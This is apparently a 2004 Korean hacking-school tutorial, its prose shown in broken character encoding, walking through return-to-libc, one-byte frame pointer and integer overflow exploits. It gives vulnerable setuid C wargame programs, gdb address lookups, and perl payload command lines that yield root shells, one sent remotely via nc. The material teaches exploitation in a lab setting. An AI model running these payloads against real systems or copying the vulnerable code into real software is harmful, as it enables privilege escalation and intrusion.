Å« ¸Þ¸®Æ®°¡ ¾ø´Ù°í °³ÀÎÀûÀ¸·Î »ý°¢ÇÕ´Ï´Ù. ±×·¯³ª, ÀÌ·¯ÇÑ °ø°Ý ¹æ¹ýµµ ÀÖ´Ù´Â °ÍÀ» ¾Ë
¼ö ÀÖ°í, ÀÌ ±â¹ýÀ» ÀÀ¿ëÇÏ¿© ´õ ÁÁÀº ±â¹ýµµ ³ª¿Ã ¼ö ÀÖÀ»°Å¶ó »ý°¢µË´Ï´Ù.


5. ¶ó¸¶±×¶ó ¹öÀü #1

Overflow ¿¡ °ü½ÉÀÌ ÀÖÀ¸½Å ºÐµéÀº The Omega Project ¸¦ µé¾îº¸¼ÌÀ» °Ì´Ï´Ù. ¶ó¸¶±×¶ó
¶ó´Â ¿Ü±¹ ÇØÄ¿¿¡ ÀÇÇؼ­ ¾Ë·ÁÁø overflow °ø°Ý ±â¹ýÀε¥, °£·«ÇÏ°Ô ¼³¸íÇغ¸ÀÚ¸é
return to library ¸¦ ÀÌ¿ëÇÏ´Â °ÍÀÔ´Ï´Ù.

½Ã½ºÅÛ ³»¿¡¼­ ÀÌÁø ÆÄÀÏÀº ´ëºÎºÐ °øÀ¯ ¶óÀ̺귯¸®ÀÇ Äڵ带 ÀÌ¿ëÇÏ°Ô µË´Ï´Ù.
°øÀ¯ ¶óÀ̺귯¸®°¡ ¸ÅÇÎµÈ ¸Þ¸ð¸® ÁÖ¼Ò¿¡ Á¢±ÙÇÏ¿©, ƯÁ¤ ±â°è¾î Äڵ带 Á÷Á¢ »ðÀÔÇÏ¿©
»ç¿ëÇÏÁö ¾Ê°íµµ ¿øÇÏ´Â ±â´ÉÀ» ¼öÇàÇÒ ¼ö ÀÖ´Â °ÍÀÌ ÀåÁ¡ÀÔ´Ï´Ù.

ÀÚ¼¼ÇÑ ±â¹ýÀº The Omega Project ¹®¼­¸¦ º¸½Ã±â ¹Ù¶ó¸ç, 1 ÆÄÆ®¿¡¼­´Â Omega ¹®¼­¿¡¼­
³ª¿Â ¹æ¹ýÀ» wargame À¸·Î ¸¸µé°í ±× °ÍÀ» Ç®ÀÌÇÏ¿© º¸°Ú½À´Ï´Ù.


/* 5.c */

void function(char *str)
{
char buf[4];

strcpy(buf, str);
}

int main(int argc, char *argv[])
{

if(argc==2)
function(argv[1]);

}


[root@hacking doc]# gcc -o 5 5.c
[root@hacking doc]# chmod 6755 5


¸ÅÇÎµÈ °øÀ¯ ¶óÀ̺귯¸®ÀÇ system() ÇÔ¼ö¸¦ ½ÇÇàÇÏ°í, À̶§ ½ÇÇàÇÏ´Â garbage ¸¦
ÆÄÀÏ À̸§À¸·Î ¸¸µé¾î ½©À» ¾ò¾îº¸°Ú½À´Ï´Ù.


[beist@hacking doc]$ gdb 5
(gdb) b main
Breakpoint 1 at 0x8048348
(gdb) r
Starting program: /bof/doc/5

Breakpoint 1, 0x08048348 in main ()
(gdb) x/i system
0x42041e50 <system>: push %ebp
(gdb) quit


system ÀÇ ÁÖ¼Ò´Â 0x42041e50 ÀÔ´Ï´Ù.


[beist@hacking doc]$ ./5 `perl -e 'print "\x50\x1e\x04\x42"x3'`
sh: line 1: ä¡B?@€? command not found
Illegal instruction


system() ÇÔ¼ö°¡ ½ÇÇàµÇ¾úÁö¸¸ ÀÌ»óÇÑ ¹®ÀÚ¿­ ¶§¹®¿¡ command not found ¶ó´Â
¿¡·¯°¡ ³ª°Ô µË´Ï´Ù.


[beist@hacking doc]$ ./5 `perl -e 'print "\x50\x1e\x04\x42"x3'` 2> err
Illegal instruction


¿¡·¯ ¸Þ¼¼Áö¸¦ ¸®´ÙÀÌ·º¼ÇÀ» ÅëÇØ err ÆÄÀÏ¿¡ ´ã¾Ò½À´Ï´Ù.


[beist@hacking doc]$ cat err|awk -F ':' '{print $3}'|awk -F ' ' '{print $1}' > ok
[beist@hacking doc]$ cat ok
ä¡B?@€?


awk ¸¦ ÀÌ¿ëÇÏ¿© ¿¡·¯ ¸Þ¼¼Áö¿¡¼­, garbage ¹®ÀÚ°ª¸¸ ±¸º°ÇÏ¿© ok ÆÄÀÏ¿¡ ´ã¾Ò½À´Ï´Ù.
ÀÌ garbage ¹®ÀÚ¿­·Î, /bin/sh ¸¦ °¡¸£Å°´Â ½Éº¼¸¯ ¸µÅ©¸¦ ¸¸µé°Ú½À´Ï´Ù.


[beist@hacking doc]$ ln -s /bin/sh `cat ok`
[beist@hacking doc]$ ls -al
ÇÕ°è 80
drwxrwxrwx 2 beist beist 4096 2¿ù 4 04:41 .
drwxrwxrwx 3 root root 4096 2¿ù 3 07:51 ..
-rwsr-sr-x 1 root root 11399 2¿ù 4 04:29 5
-rw-r--r-- 1 root root 132 2¿ù 4 04:28 5.c
-rw-rw-r-- 1 beist beist 42 2¿ù 4 04:34 err
-rw-rw-r-- 1 beist beist 11 2¿ù 4 04:38 ok
lrwxrwxrwx 1 beist beist 7 2¿ù 4 04:41 ä¡?B?+?@?? -> /bin/sh


½Éº¼¸¯ ¸µÅ©ÀÇ ÆÄÀÏÀÌ ¼º°øÀûÀ¸·Î ¸¸µé¾îÁ³½À´Ï´Ù. ±×·³, PATH ȯ°æ º¯¼ö¿¡ ÇöÀç
µð·ºÅ丮¸¦ ¶æÇÏ´Â, "." ¸¦ Ãß°¡ÇÏ°Ú½À´Ï´Ù.


[beist@hacking doc]$ PATH=.:$PATH
[beist@hacking doc]$ export PATH


°ø°ÝÀ» ½ÃµµÇغ¸°Ú½À´Ï´Ù.


[beist@hacking doc]$ ps
PID TTY TIME CMD
11717 pts/0 00:00:00 bash
13372 pts/0 00:00:00 ps
[beist@hacking doc]$ ./5 `perl -e 'print "aaaabbbb","\x50\x1e\x04\x42"'`
[beist@hacking doc]# ps
PID TTY TIME CMD
11717 pts/0 00:00:00 bash
13375 pts/0 00:00:00 ä¡B?@€?
13404 pts/0 00:00:00 ps


°ø°ÝÀ» ½ÃµµÇÏ°í ³­ ÈÄ¿¡, garbage ¹®ÀÚ¿­À» °¡Áø ½Éº¼¸¯ ¸µÅ© ÆÄÀÏÀÌ /bin/sh
¸¦ °¡¸£ÄÑ ¼º°øÀûÀ¸·Î ½ÇÇàµÈ °ÍÀ» ps ¸í·É¾î·Î È®ÀÎÇÒ ¼ö ÀÖ¾ú½À´Ï´Ù.


6. ¶ó¸¶±×¶ó ¹öÀü #2


¶ó¸¶±×¶ó 2 ÆÄÆ®¿¡¼­´Â ¶ó¸¶±×¶ó°¡ ¹ßÇ¥ÇÑ Omega Project ¸¦ ÀÀ¿ëÇÑ °ø°Ý
±â¹ýÀ» ¼³¸íÇÏ°Ú½À´Ï´Ù.

1 ÆÄÆ®¿¡¼­ ¿ì¸®°¡ system() ÇÔ¼ö¸¦ ½ÇÇàÇßÀ» ¶§, garbage ¹®ÀÚ¿­ÀÌ ½ÇÇàÀÌ
µÇ¾ú½À´Ï´Ù. ÀÌ garbage ¹®ÀÚ´Â ´ÙÀ½°ú °°Àº À§Ä¡¿¡¼­ ÂüÁ¶µË´Ï´Ù.


[buf] [sfp] [ret] [dummy] [dummy2]


¿©±â¼­ ret ¸¦ system() À¸·Î Àâ¾Ò´Ù¸é, system() ÇÔ¼öÀÇ ÀÎÀÚ·Î, ret+4 À§Ä¡ÀÎ,
dummy2 ¿¡¼­ ÂüÁ¶¸¦ ÇÏ°Ô µË´Ï´Ù. dummy2 °¡ °¡¸£Å°°í ÀÖ´Â ¸Þ¸ð¸®¸¦ system()
ÇÔ¼öÀÇ ÀÎÀÚ·Î ÂüÁ¶ÇÏ°Ô µÇ´Â °ÍÀÔ´Ï´Ù.

¿ì¸®´Â Shell À» ½ÇÇà½ÃÅ°·Á°í Çϴϱî ret ´Â system() ÀÇ ÁÖ¼Ò¸¦ ÁöÁ¤ÇÏ°í,
dummy2 ¸¦, /bin/sh ¸¦ °¡¸£Å°´Â À§Ä¡·Î ÁöÁ¤À» ÇÏ¸é µË´Ï´Ù. ¶ó¸¶±×¶óÀÇ
±Û¿¡¼­´Â °øÀ¯ ¶óÀ̺귯¸®¿¡¼­ /bin/sh ¸¦ ã¾Ò¾ú´Âµ¥, ¿©±â¼­´Â ´Ù¸¥ ¹æ¹ýÀ¸·Î
¾Ë¾Æº¸°Ú½À´Ï´Ù.

ÀÌ wargame Àº remote ȯ°æÀÔ´Ï´Ù.

¸Þ¸ð¸®¿¡ Shell À» ½ÇÇà½Ãų ¼ö Àִ ƯÁ¤ ¹®ÀÚ¿­À» ¿Ã¸° ÈÄ, dummy2 ¿¡ ±× °ÍÀ»
ÁöÁ¤ÇØÁÖ´Â ¹æ¹ýÀ» Çغ¸°Ú½À´Ï´Ù.

¿ì¸®°¡ ¿øÇÏ´Â ¹®ÀÚ¿­À» ¸Þ¸ð¸®¿¡ Áý¾î³Ö±â À§ÇÑ ¹æ¹ýÀº ¿©·¯°¡Áö°¡ Àִµ¥
¸î°¡Áö ¿¹¸¦ µé¾îº¸ÀÚ¸é ´ÙÀ½°ú °°½À´Ï´Ù.


1. argc ÀÌ¿ëÇϱâ
2. argv ÀÌ¿ëÇϱâ
3. ȯ°æ º¯¼ö ÀÌ¿ëÇϱâ
4. ÇÁ·Î±×·¥ÀÇ buffer ÀÌ¿ëÇϱâ
5. ±âŸ ÇÁ·Î±×·¥ ÀÎÅÍÇÁ¸®ÅÍ Å×À̺í


overflow ÀÇ ±Ã±ØÀûÀÎ ¸ñÀûÀº shell À» ¶ç¿ì´Â °ÍÀε¥, ¶ó¸¶±×¶ó ±â¹ý¿¡¼­ ½©À»
¶ç¿ì±â À§Çؼ­´Â ½©À» ½ÇÇà½Ãų ¼ö ÀÖ´Â ¹®ÀÚ¿­À» ã¾Æ¾ßÇÕ´Ï´Ù. ¿ì¸®°¡ ¿©±â¼­
ÀÌ¿ëÇÒ ¹®ÀÚ¿­Àº ȯ°æ º¯¼ö ³»¿¡ Á¸ÀçÇÏ´Â SHELL ȯ°æ º¯¼öÀÇ °ªÀ» ÀÌ¿ëÇÒ °Í
ÀÔ´Ï´Ù. bash ¸¦ »ç¿ëÇÑ´Ù¸é SHELL ȯ°æ º¯¼öÀÇ °ªÀº "/bin/bash" °¡ µË´Ï´Ù.


[beist@hacking beist]$ echo $SHELL
/bin/bash


"/bin/bash" °¡ Ãâ·ÂµÇ´Â °ÍÀ» º¼ ¼ö ÀÖ½À´Ï´Ù.

º»°ÝÀûÀ¸·Î wargame ¹®Á¦¸¦ Çϳª ¸¸µé¾î¼­ Ç®¾îº¸°Ú½À´Ï´Ù.


/* 6.c */

void function(char *str)
{
char buf[4];

strncpy(buf, str, 20);

memset(buf, 0, 8);
memset(buf+12, 0, 4);

if(buf[19]=='\x40' || buf[19]=='\x41' || buf[19]=='\x42' || buf[19]=='\x08')
{
printf("Error\n");
exit(-1);
}
}

int main(int argc, char *argv[])
{
if(argc==2)
{
if(strlen(argv[1]) <= 20 || strlen(argv[0]) > 3)
function(argv[1]);
}
}


¾Õ¼­ ¼³¸íÇÏ¿´µíÀÌ ÀÌ ¹®Á¦´Â ȯ°æ º¯¼öÀÇ ¹®ÀÚ¿­À» ÀÌ¿ëÇÏ¿©¼­ Ç® °ÍÀÔ´Ï´Ù. ±×
Àü¿¡ ¹®Á¦¸¦ ¸®¸ðÆ®·Î ¼³Á¤Çϱâ À§ÇØ ´ÙÀ½°ú °°ÀÌ ¼³Á¤ÇÏ°Ú½À´Ï´Ù.



* wargame ¹®Á¦¸¦ ¸®¸ðÆ®·Î Ç®±â À§ÇØ xinetd.d ¿¡ µî·ÏÇÏ´Â °úÁ¤ *


[beist@hacking wargame]# gcc -o 6 6.c
[beist@hacking wargame]# cat > /etc/xinetd.d/lama2

service lama2
{
disable = no
flags = REUSE
socket_type = stream
wait = no
user = root
server = /wargame/6
log_on_failure += USERID
}

(Ctrl + D ÀÔ·Â)

[beist@hacking wargame]# echo "lama2 6666/tcp" > /etc/services
[beist@hacking wargame]# /etc/rc.d/init.d/xinetd restart
xinetd Stop OK...
xinetd Start OK...



wargame ¹®Á¦°¡ xinetd µ¥¸ó¿¡ Á¤»óÀûÀ¸·Î µî·ÏÀÌ µÇ¾ú´Ù¸é wargame ¼­¹öÀÇ 6666
Æ÷Æ®·Î Á¢¼ÓÇßÀ» ¶§, wargame ¹®Á¦°¡ ¶ã °ÍÀÔ´Ï´Ù.


ÇöÀç target ÇÁ·Î±×·¥ÀÇ buffer »óÅ´ ´ÙÀ½°ú °°½À´Ï´Ù.


[ buf ] [ sfp ] [ ret ] [dummy] [dummy2]


buf ¿¡¼­ºÎÅÍ 20 ¹ÙÀÌÆ®¸¦ µ¤¾î¾º¿ï¼ö Àֱ⠶§¹®¿¡ ½ÇÁ¦·Î ¿ì¸®°¡ Á¢±ÙÇÒ ¼ö ÀÖ´Â
¿µ¿ªÀº buf~dummy2 ¿µ¿ª±îÁöÀÔ´Ï´Ù. memset À¸·Î ÀÎÇؼ­, buf, sfp, dummy ¿µ¿ªÀº
ÃʱâÈ­µÇ¹Ç·Î ÀÌ¿ëÇÒ ¼ö ¾ø½À´Ï´Ù. ±×·¯¹Ç·Î ½ÇÁúÀûÀ¸·Î ÀÌ¿ëÇÒ ¼ö ÀÖ´Â buffer´Â
ret ¿Í dummy2 ÀÔ´Ï´Ù.

¿ì¸®°¡ ¾Ë¾Æ¾ß ÇÒ ¿µ¿ªÀº system() ÇÔ¼öÀÇ ÁÖ¼Ò¿Í SHELL ȯ°æ º¯¼öÀÇ ÁÖ¼Ò°ªÀε¥
ÀÌ ¿µ¿ªÀº ´ÙÀ½À̶ó°í °¡Á¤ÇÏ°Ú½À´Ï´Ù.


system = 0x8048424
SHELL = 0xbfffffe2


(½ÇÁ¦ wargame ¿¡¼­´Â system() ÇÔ¼ö¸¦ Ãâ·ÂÇØÁÖ´Â °æ¿ì°¡ ¸¹À¸¸ç, ±×·¸Áö ¾ÊÀ¸¸é
brute force ¸¦ ÅëÇØ ¾Ë¾Æ³»¾ß ÇÕ´Ï´Ù.)


[beist@hacking beist]$ (perl -e 'print "aaaabbbb\x24\x84\x04\x08cccc\xe2\xff
\xff\xbf"';cat)|nc target 6666

id;
uid=0(root) gid=0(root)


root ½©À» ȹµæÇÏ¿´½À´Ï´Ù.


7. frame pointer

frame pointer overflow ±â¹ýÀº ÀϹÝÀûÀÎ overflow ±â¹ý°ú´Â Á¶±Ý ´Ù¸¨´Ï´Ù.
1 byte ¸¸À» overflow ½Ãų ¼ö ÀÖ½À´Ï´Ù. Á¦ 2 ¼¼´ë ±â¹ýÀ̶ó°íµµ ºÒ¸®´Â overflow
°ø°Ý ±â¼úÀ̸ç phrack 55 È£¿¡ ¼Ò°³µÇ¾î ÀÖ½À´Ï´Ù.

ÇÔ¼ö°¡ ³¡³¯ ¶§, ebp -> esp °¡ µÇ°í, ret ´Â esp -> eip ·Î ¸¸µì´Ï´Ù.

1 byte ¸¦ overflow ½Ãų ¼ö ÀÖ´Ù´Â À̾߱â´Â ebp ÀÇ ¸¶Áö¸· ÀÚ¸® ¼ö¸¦ ÇØÄ¿ ¸¶À½´ë·Î
º¯Á¶½Ãų ¼ö ÀÖ´Ù´Â °ÍÀ» ÀǹÌÇÕ´Ï´Ù.

wargame ¼Ò½º´Â ´ÙÀ½°ú °°½À´Ï´Ù.


7.c

void func(char *str)
{

char buf[4];
int i;

for(i=0;i<=4;i++)
buf[i]=str[i];

}

int main(int argc, char *argv[])
{

if (argc == 2)
func(argv[1]);

}

[beist@hacking doc]# gcc -o 7 7.c
[beist@hacking doc]# chmod 6755 7


¼Ò½º¿¡¼­ º¸½Ã´Ù½ÃÇÇ, buffer ´Â 4 ¹ÙÀÌÆ®Áö¸¸ À߸øµÈ for ¹® »ç¿ëÀ¸·Î ÀÎÇØ
buffer ¿¡ 5 ¹ÙÀÌÆ®¸¦ ³ÖÀ» ¼ö ÀÖ½À´Ï´Ù. Áï, ebp ÀÇ ¸¶Áö¸· ¹ÙÀÌÆ®¸¦ µ¤À» ¼ö
ÀÖ´Ù´Â À̾߱âÀÔ´Ï´Ù.

buffer »óÅÂÀÔ´Ï´Ù.

[ buf ] [ ebp ] [ ret ]


°ø°Ý ¹æ¹ý·Ð.

1. eggshell À» ¶ç¿î´Ù.
2. buf ´Â eggshell ÀÇ ÁÖ¼Ò¸¦ °¡¸£Å²´Ù.
3. ebp ÀÇ ¸¶Áö¸· ¹ÙÀÌÆ®¸¦ buf ÀÇ ÁÖ¼Ò¸¦ °¡¸£Å²´Ù.


¿©±â¼­ buf ÀÇ ÁÖ¼Ò´Â 0xbffff008 À̶ó°í °¡Á¤ÇÏ°Ú½À´Ï´Ù. ½ÇÁ¦ ÀÛ¾÷¿¡¼­´Â
µð¹ö±ëÀ̳ª dumpcode ¸¦ ÅëÇؼ­ ¾Ë¾Æº¸½Ã±â ¹Ù¶ø´Ï´Ù.


[beist@hacking doc]$ ./egg
Using address: 0xbffff9f8
[beist@hacking doc]$ ./7 `perl -e 'print "\xf8\xf9\xff\xbf\x04"'`
sh-2.05b#
uid=0(root) gid=0(root) groups=500(beist)


½©À» ȹµæÇÏ¿´½À´Ï´Ù. ¿ø·¡ ebp ´Â 0xbffff0xx ¸¦ °¡¸£Å°°í ÀÖ°ÚÁö¸¸, ¸¶Áö¸·
1 byte ¸¦ \x04 ·Î µ¤¾î¾º¾ú½À´Ï´Ù. ebp °¡ pop µÇ±âÀü ebp ´Â, ¿ì¸®°¡ Á¶ÀÛÇÑ
0xbffff004 °¡ µÇ°ÚÁö¸¸, pop ÀÌ µÉ ¶§ ½ºÅÃÀÌ +4 °¡ µÇ¹Ç·Î °á°úÀûÀ¸·Î
0xbffff008 ÀÌ µÉ °ÍÀÔ´Ï´Ù. 0xbffff008 Àº egg shell ÀÇ ÁÖ¼ÒÀÎ 0xbffff9f8 À»
°¡¸£Å°°í ÀÖÀ¸¹Ç·Î ¿ì¸®´Â ½©À» µþ ¼ö ÀÖ¾ú½À´Ï´Ù.


ps. gcc ÀÇ »óÀ§ ¹öÀü¿¡¼­, ¸¸¾à ¹öÆÛ »çÀÌ¿¡ garbage °ªÀÌ ³¢¾î¼­ ebp ÀÇ
¸¶Áö¸· ¹ÙÀÌÆ®¿¡ µµ´ÞÇÒ ¼ö ¾ø´Ù¸é, frame pointer overflow °ø°ÝÀº ¼º°øÇÒ ¼ö
¾ø½À´Ï´Ù. Ȥ½Ã garbage °¡ ³¢¾î, ebp ¸¦ ¼öÁ¤ÇÒ ¼ö ¾ø´Â »óȲ¿¡¼­µµ °ø°ÝÀ»
¼º°øÇÏ´Â ¹æ¹ýÀ» ¾Ë°í °è½Å ºÐÀº Àú¿¡°Ô ¿¬¶ôÁÖ½Ã¸é °¨»çÇÏ°Ú½À´Ï´Ù.


8. integer overflow

integer overflow ´Â ºñ±³Àû ÃÖ±Ù¿¡ ¼Ò°³µÈ overflow ±â¹ýÀÔ´Ï´Ù. °¢
º¯¼ö°¡ »ç¿ëÇÒ ¼ö ÀÖ´Â ¹üÀ§¸¦ ³Ñ¾î¼¹À» ¶§ integer overflow °¡ ÀϾ°Ô
µÇ´Âµ¥, À̶§ ¸¸¾à ÇÁ·Î±×·¥¿¡¼­ º¯¼ö°¡ Â÷ÁöÇÏ´Â ºñÁßÀÌ ÄÇÀ» ¶§ Shell À»
µû°Å³ª ƯÁ¤ ÇàÀ§¸¦ ÇÒ ¼öµµ ÀÖ½À´Ï´Ù. ÀÌ ±â¹ý¿¡ ´ëÇÑ ÀÚ¼¼ÇÑ ¹æ¹ýÀº
phrack 60 È£¸¦ º¸½Ã°Å³ª, Á¦°¡ ºÎ¿¬ ¼³¸íÀ» ÇÑ ±ÛÀÌ ÀÖÀ¸´Ï ±× °Íµµ
ÂüÁ¶Çغ¸½Ã±â ¹Ù¶ø´Ï´Ù.


/* 8.c */

void function(char *str, int count)
{
char buf[65000];

strncpy(buf, str, count);

printf("result : %s\n");
}

int main(int argc, char *argv[])
{
unsigned short check;
int auth;

if(argc != 3)
{
printf("EX) %s int string\n", argv[0]);
return -1;
}

auth=atoi(argv[1]);

check=auth;

if(check >= 65000)
{
printf("check ¿¡ °É·ÈÀ½\n");
return -1;
}

function(argv[2], auth);

}


´ÙÀ½°ú °°Àº ¹æ¹ýÀ¸·Î °ø°ÝÀ» ½ÃµµÇغ¸°Ú½À´Ï´Ù.


1. ½©Äڵ带 ¸Þ¸ð¸®¿¡ ¿Ã·Á³õ´Â´Ù. (egg shell)
2. argv[1] ¿¡ 65536 À» ÀÔ·ÂÇÑ´Ù.
3. argv[2] ¿¡ 65536 ¸¸Å­ÀÇ egg shell ÀÇ ÁÖ¼Ò¸¦ ÀÔ·ÂÇÑ´Ù.
(ÁÖ¼Ò°ªÀº 4 ¹ÙÀÌÆ®¸¦ Â÷ÁöÇÏ°í 65536 ¸¸Å­ ÀÔ·ÂÇÏ·Á¸é 4*16384 ¸¦ ÇؾßÇÕ´Ï´Ù.)


[beist@beist bof]$ ./egg
Using address: 0xbffffb18
[beist@beist bof]$ ./8 65536 `perl -e 'print "\x18\xfb\xff\xbf"x16384'`
result : ¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿¿û¿û¿û¿û¿
û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿
.. »ý·« ..
.. »ý·« ..
.. »ý·« ..
û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿
sh-2.05#



9. ±âŸ overflow ¹æ¹ý (±ÛÀ» ¸¶Ä¡¸é¼­)

ÀÌ ¹®¼­´Â overflow ÀÇ ¸ðµç ±â¹ý¿¡ ´ëÇؼ­ ´Ù·é ¹®¼­´Â ¾Æ´Õ´Ï´Ù.

buffer overflow °ø°Ý ±â¼úÀº, Å×Å©´ÐÀº °¢°¢ ´Þ¶óµµ ±Ã±ØÀûÀ¸·Î´Â return address ¸¦
º¯°æ ½ÃÄÑ¾ß ÇÑ´Ù´Â Á¡¿¡¼­ °øÅëÁ¡ÀÌ ÀÖ½À´Ï´Ù. À§¿¡¼­ ¼³¸íÇÑ ¹æ¹ý ÀÌ¿Ü¿¡µµ ´Ù¸¥
°ø°Ý °¡´É¼º°ú, °ø°Ý ±â¹ýµéÀÌ Á¸ÀçÇÕ´Ï´Ù.

ÀÌ ¹®¼­¿¡¼­ ¼Ò°³ÇÑ ³»¿ë ÀÌ¿Ü¿¡µµ Á¦ ȨÆäÀÌÁö¿¡¼­ ´Ù¸¥ Á¾·ùÀÇ overflow Ç®ÀÌ¿¡
´ëÇؼ­ ´Ù·ç°í ÀÖÀ¸´Ï ±× ±Ûµéµµ Àо½Ã±â ¹Ù¶ø´Ï´Ù.



  Hit : 15700     Date : 2004/07/07 05:18



    
41   ¸®´ª½º ¼³Ä¡Çϱâ - ±âÃÊÆí[5]     ¼ÒÀ¯
10/06 11254
40   ¸®´ª½º ¼³Ä¡Çϱâ - ÆÁÆí     ¼ÒÀ¯
10/06 8853
39   ¸®´ª½º ¼³Ä¡Çϱâ - ÆÄƼ¼ÇÆí[6]     ¼ÒÀ¯
10/06 9494
38   ¸®´ª½º ¼³Ä¡Çϱâ - µð·ºÅ丮Æí     ¼ÒÀ¯
10/06 9265
37   ¾ÕÀ¸·Î À̾îÁú ±Û¿¡ ´ëÇؼ­.....[2]     ¼ÒÀ¯
10/06 8462
36   ¸®´ª½º ¼³Ä¡Çϱâ - ½©Æí[2]     ¼ÒÀ¯
10/07 9625
35   ¸®´ª½º ¼³Ä¡Çϱâ - RPMÆí[3]     ¼ÒÀ¯
10/09 9580
34   [Àâ] ³×Æ®¿öÅ© IP[5]     ¼ÒÀ¯
11/01 10101
33   [Àâ] ³×Æ®¿öÅ© TCP[8]     ¼ÒÀ¯
10/31 9115
32   ÀÎÅͳݿ¡ ¸®´ª½º ¼­¹ö ±¸ÃàÇϱâ[1]     ¼ÒÀ¯
07/07 14746
31   ¿Ö C À̾î¾ß Çϴ°¡ ?[96]     ¼ÒÀ¯
04/09 24893
  Overflow °ø°Ý ±â¹ýµé¿¡ ´ëÇÑ Á¤¸® by ¹ö½ºÆ®     ¼ÒÀ¯
07/07 15699
29   ¹öÆÛ¿À¹öÇ÷οì by ¿ÀÇ϶ó[3]     ¼ÒÀ¯
07/07 15258
28   Format String Attack - Concept and General Exploit (by Seo SungHyen)[6]     ¼ÒÀ¯
07/07 11426
27   [ÀÚÀÛ] FTZ Æ®·¹ÀÌ´× 1~10±îÁö °£´ÜÇÏ°Ô Á¤¸®[14]     ¼Ò¿ï
03/01 14955
26   [ÀÚÀÛ] À©µµ¿ì cmd ÆÁ - º¹»çÇϱâ[7]     ¼Ò¿ï
03/01 9164
25   [ÀÚÀÛ] [C¹®Á¦] Á¡(.)À» »« ¹®ÀÚ Ãâ·ÂÇϱâ[1]     ¼Ò¿ï
03/20 6767
24   [ÀÚÀÛ] [C¹®Á¦] ¼Ò¼ö¸¸ °É·¯³»±â[2]     ¼Ò¿ï
03/20 7964
23   [ÀÚÀÛ] [C¹®Á¦] ´ë¼Ò¹®ÀÚ ¹Ù²Ù±â[3]     ¼Ò¿ï
03/20 7184
22   IP ¿Í PORT[8]     ¼Û½Ã
11/02 10023
[1]..[71][72][73][74][75][76][77] 78 [79][80]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org